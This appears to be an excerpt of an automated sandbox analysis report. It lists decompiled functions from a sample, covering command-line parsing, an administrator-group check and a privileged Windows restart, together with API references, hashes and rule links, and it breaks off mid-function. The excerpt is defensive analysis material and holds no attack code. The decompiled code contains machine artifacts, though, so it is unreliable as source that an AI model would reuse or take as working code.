Instruction Fuzzy Hash: F6F0F8B1504B089E87618E3A9C00657FBE9AAB5360B51092AB4BED21D0FB30A841DF90

Uniqueness

Uniqueness Score: -1.00%

Function 009366AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009366AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x009366b1
0x009366ba
0x009366c7
0x009366bc
0x009366be
0x009366be

APIs

GetFileAttributesA.KERNELBASE(?,00934777,?,00934E38,?), ref: 009366B1

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c97e2fc95e242d63dfa3412a0f9828713f79fbb62ddcc487229fbac4f4a764b3
Instruction ID: e8aa7d1a6d1256ef5decf100bc4f2c141f0c3a6052ffa1a14546e90dee12ef8b
Opcode Fuzzy Hash: c97e2fc95e242d63dfa3412a0f9828713f79fbb62ddcc487229fbac4f4a764b3
Instruction Fuzzy Hash: 8FB09276236840526A2406726C2A5562889A6C223ABE45B90F032C11E0CA3EC846E804

Uniqueness

Uniqueness Score: -1.00%

Function 00934CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00934CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00934caa
0x00934cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00934CAA

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: baea5bbf586fea8daa22e258c7c8a3626a58af800e89aa4e31303edbd2986a6d
Instruction ID: f33e079e9cf87113e18b9678459b55d7cec84071306d19514d9546ac72c575bb
Opcode Fuzzy Hash: baea5bbf586fea8daa22e258c7c8a3626a58af800e89aa4e31303edbd2986a6d
Instruction Fuzzy Hash: 69B0123204830CB7CF001FC2EC09F853F1DE7C5771F140000F60C450508A7298109A96

Uniqueness

Uniqueness Score: -1.00%

Function 00934CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00934CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00934cc8
0x00934ccf

APIs

GlobalFree.KERNEL32 ref: 00934CC8

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 04740a9c5ad048b8a977fd4d4546f84d43e940b2fe0fc7f6570318d45644073a
Instruction ID: 52f8f7510e89994782756698321d588f0cc4d7c7db9231e535ed9653687b0243
Opcode Fuzzy Hash: 04740a9c5ad048b8a977fd4d4546f84d43e940b2fe0fc7f6570318d45644073a
Instruction Fuzzy Hash: B3B0123100410CB78F001B42EC088453F1DD6C12707000010F50C410218B339C119985

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00935C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00935C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x938004; // 0x911e09f9
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00936CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00936E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x938004; // 0x911e09f9
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0093597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E009344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x939124 = E00936285();
									_t75 = 0;
								}
								return E00936CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E009344B9(0, 0x521, 0x931140, 0, 0x40, 0);
												_t85 =  *0x938588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0093667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0093667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00935C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00931680(0x938c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0093667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0093667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x938a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00935C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x938b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x938a3a;
																}
																E00931680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0093658A(_t218, 0x104, 0x931140);
																if(E009331E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x938a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x938a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x938a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x938a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x938a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x939a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x939a2c =  *0x939a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x938d48 =  *0x938d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x939a2c =  *0x939a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x939a2c =  *0x939a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x938d48 =  *0x938d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x939a2c =  *0x939a2c | 0x00000004;
																										L70:
																										 *0x938a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x939a2c = 3;
																	 *0x938a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x938a2c != 0 &&  *0x938b3e == 0) {
						if(GetModuleFileNameA( *0x939a3c, 0x938b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E009366C8(0x938b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00935c9e
0x00935ca9
0x00935cb0
0x00935cb3
0x00935cb6
0x00935cb7
0x00935cb8
0x00935cbd
0x00936204
0x00935ccb
0x00000000
0x00935ccb
0x00935cd3
0x00935cd7
0x00935cf4
0x00000000
0x00935cf4
0x00935cf8
0x00935d00
0x00000000
0x00935d06
0x00935d06
0x00935d0e
0x00935d10
0x00935d12
0x00935d14
0x00935d15
0x00935d17
0x00935d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00935d19
0x00935d19
0x00935d1d
0x00000000
0x00935d3f
0x00935d3f
0x00935d4b
0x00935d4b
0x00935d4f
0x00935d8d
0x00000000
0x00935d93
0x00935d93
0x00935d9a
0x00935d9d
0x00935d9e
0x00000000
0x00935d9e
0x00935d51
0x00935d5b
0x00935d72
0x009360fb
0x009360fb
0x00936207
0x0093620a
0x0093620b
0x0093620e
0x00936217
0x00935d78
0x00935d78
0x00935d80
0x00935d83
0x00935d84
0x00000000
0x00935d84
0x00935d5d
0x00935d5f
0x00935d62
0x00935d68
0x00935d64
0x00935d64
0x00935d64
0x00000000
0x00935d62
0x00935d5b
0x00935d4f
0x00935d1d
0x00000000
0x00935d9f
0x00935d9f
0x00935da5
0x00935dab
0x00935dba
0x00936218
0x0093621d
0x00936220
0x00936221
0x00936229
0x00936230
0x00936247
0x0093626a
0x00936272
0x00936249
0x00936255
0x0093625f
0x00936264
0x00936264
0x00936284
0x00935dc0
0x00935dc0
0x00935dca
0x00935e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00935dcc
0x00935dce
0x00935e24
0x00935e24
0x00935e2c
0x00935e47
0x00935e4a
0x009361d2
0x009361e2
0x009361e7
0x009361ee
0x009361f1
0x009361f1
0x009361f8
0x009361f8
0x00935e50
0x00935e53
0x00936109
0x0093611f
0x00000000
0x00936125
0x00936137
0x0093613a
0x0093613c
0x0093613e
0x0093613e
0x00936141
0x00936141
0x00936143
0x00936144
0x0093614a
0x00000000
0x00936150
0x00936152
0x0093615c
0x00936170
0x00936172
0x0093617c
0x00936190
0x00936190
0x00936196
0x009361a5
0x00000000
0x009361ab
0x009361b9
0x009361c6
0x009361c6
0x0093617e
0x00936180
0x0093618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0093618a
0x0093615e
0x00936160
0x0093616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0093616a
0x0093615c
0x0093614a
0x0093610b
0x0093610e
0x0093610e
0x00000000
0x00935e59
0x00935e59
0x00935e5c
0x0093604f
0x00936056
0x00000000
0x0093605c
0x0093606e
0x00936071
0x00936073
0x00936075
0x00936075
0x00936078
0x00936078
0x0093607a
0x0093607b
0x00936081
0x00000000
0x00936087
0x00936087
0x0093608d
0x0093609c
0x00000000
0x009360a2
0x009360aa
0x009360b2
0x009360b7
0x009360bd
0x009360bf
0x009360bf
0x009360d6
0x009360e0
0x009360e7
0x009360f5
0x00000000
0x00000000
0x00000000
0x00000000
0x009360f5
0x0093609c
0x00936081
0x00935e62
0x00935e62
0x00935e65
0x00935fd3
0x00935fe9
0x00000000
0x00935fef
0x00935fef
0x00935ff7
0x00935ffd
0x00936003
0x00936006
0x00936011
0x00936014
0x0093603d
0x00936016
0x00936018
0x00936019
0x0093601b
0x00936033
0x0093601d
0x00936020
0x00936029
0x00936022
0x00936022
0x00936022
0x00936020
0x0093601b
0x00936042
0x00936044
0x00936046
0x0093604a
0x00935ff7
0x00935fd5
0x00935fd8
0x00935fd8
0x00000000
0x00935e6b
0x00935e6b
0x00935e6e
0x00935f8b
0x00935f99
0x00000000
0x00935f9f
0x00935fa7
0x00935faf
0x00000000
0x00935fb1
0x00935fb3
0x00000000
0x00935fb5
0x00935fb7
0x00000000
0x00935fb9
0x00000000
0x00935fb9
0x00935fb7
0x00935fb3
0x00935faf
0x00935f8d
0x00935f8d
0x00935f8d
0x00935f8f
0x00935fc1
0x00935fc1
0x00935fc1
0x00000000
0x00935e74
0x00935e74
0x00935e77
0x00935ea0
0x00935ebd
0x00935f79
0x00000000
0x00935f7f
0x00935ec3
0x00935ec3
0x00935ecc
0x00935ed4
0x00935ed6
0x00935edc
0x00935edf
0x00935eea
0x00935eed
0x00935f3f
0x00935f40
0x00000000
0x00935eef
0x00935eef
0x00935ef2
0x00935f34
0x00935ef4
0x00935ef4
0x00935ef7
0x00935f2b
0x00000000
0x00935ef9
0x00935ef9
0x00935efc
0x00935f22
0x00000000
0x00935efe
0x00935eff
0x00935f02
0x00935f16
0x00935f04
0x00935f07
0x00935f0d
0x00935f46
0x00935f46
0x00935f09
0x00935f09
0x00935f09
0x00935f07
0x00935f02
0x00935efc
0x00935ef7
0x00935ef2
0x00935f4c
0x00935f4e
0x00935f50
0x00935f54
0x00935ed4
0x00935ea2
0x00935ea4
0x00935eaf
0x00935eaf
0x00000000
0x00935e79
0x00935e7d
0x00000000
0x00935e83
0x00935e83
0x00935e83
0x00935e85
0x00935e85
0x00935e8e
0x00000000
0x00935e94
0x00000000
0x00935e94
0x00935e8e
0x00935e7d
0x00935e77
0x00935e6e
0x00935e65
0x00935e5c
0x00000000
0x00000000
0x00000000
0x00935dd0
0x00935dd0
0x00935dd0
0x00000000
0x00935dd0
0x00935dce
0x00935dca
0x00935dba
0x00000000
0x00935d00
0x00935dd9
0x00935e04
0x009361fe
0x00935e0a
0x00935e0c
0x00935e17
0x00935e17
0x00935e04
0x00936200
0x00936200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00935CEE
GetModuleFileNameA.KERNEL32(00938B3E,00000104,00000000,?,?), ref: 00935DFC
CharUpperA.USER32(?), ref: 00935E3E
CharUpperA.USER32(-00000052), ref: 00935EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00935F6F
CharUpperA.USER32(?), ref: 00935FA7
CharUpperA.USER32(-0000004E), ref: 00936008
CharUpperA.USER32(?), ref: 009360AA
CloseHandle.KERNEL32(00000000,00931140,00000000,00000040,00000000), ref: 009361F1
ExitProcess.KERNEL32 ref: 009361F8

Strings

", xrefs: 00935D78
:, xrefs: 00936118
", xrefs: 0093612D
RegServer, xrefs: 00935F66

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: c1ca060117921ee205c41e4c58e57b135cb6086dc2bf91b618c100efb03a0d40
Instruction ID: b2944ffa7aa01fe95455a428effcf23201fe2da7d805715a22c1a79ed69fda37
Opcode Fuzzy Hash: c1ca060117921ee205c41e4c58e57b135cb6086dc2bf91b618c100efb03a0d40
Instruction Fuzzy Hash: E4D18071A0CB446FDF358B389C483F777A9AB5E304F1645AAD4D6C6190DAB48E82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 009318A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E009318A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x938004; // 0x911e09f9
				_v8 = _t23 ^ _t53;
				_t25 =  *0x938128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00936CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E009317EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x938128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x938128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x009318a3
0x009318a3
0x009318ab
0x009318b2
0x009318b5
0x009318be
0x009318c0
0x009318c6
0x009318c7
0x009318ca
0x009318cf
0x009319c9
0x009319d8
0x009319d8
0x009318df
0x009319b8
0x009319bd
0x009319bf
0x009319bf
0x00000000
0x009319bd
0x009318fa
0x00000000
0x00000000
0x00931912
0x009319aa
0x009319ad
0x009319b3
0x00000000
0x00931927
0x00931927
0x00931932
0x00931936
0x009319a9
0x009319a9
0x00000000
0x009319a9
0x0093194c
0x009319a2
0x009319a3
0x00000000
0x0093196e
0x00931970
0x00931999
0x0093199c
0x00000000
0x0093199c
0x00931972
0x00931972
0x00931975
0x00931984
0x00931985
0x0093198a
0x00000000
0x00000000
0x00000000
0x0093198c
0x00931991
0x00931996
0x00000000
0x00931996
0x0093194c

APIs

Part of subcall function 009317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009318DD), ref: 0093181A
Part of subcall function 009317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0093182C
Part of subcall function 009317EE: AllocateAndInitializeSid.ADVAPI32(009318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009318DD), ref: 00931855
Part of subcall function 009317EE: FreeSid.ADVAPI32(?,?,?,?,009318DD), ref: 00931883
Part of subcall function 009317EE: FreeLibrary.KERNEL32(00000000,?,?,?,009318DD), ref: 0093188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009318EB
OpenProcessToken.ADVAPI32(00000000), ref: 009318F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0093190A
GetLastError.KERNEL32 ref: 00931918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0093192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00931944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00931964
EqualSid.ADVAPI32(00000004,?), ref: 0093197A
FreeSid.ADVAPI32(?), ref: 0093199C
LocalFree.KERNEL32(00000000), ref: 009319A3
CloseHandle.KERNEL32(?), ref: 009319AD

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 43adb5f09a227a02f052ede3bd8a7379e86b6fbf507b4e3737bd5ffd666bbe2a
Instruction ID: dc1f24aebffe9c7e81533e9acf5ec0e667fae6f6f713af495f0c92bd359ffe18
Opcode Fuzzy Hash: 43adb5f09a227a02f052ede3bd8a7379e86b6fbf507b4e3737bd5ffd666bbe2a
Instruction Fuzzy Hash: 08312A75A14209AFDB20DFA5EC98BAFBBBCFF49700F104429E585D2160DB319905DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00931F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00931F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x939a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x938004; // 0x911e09f9
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E009344B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00936CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E009344B9(0, 0x522, 0x931140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
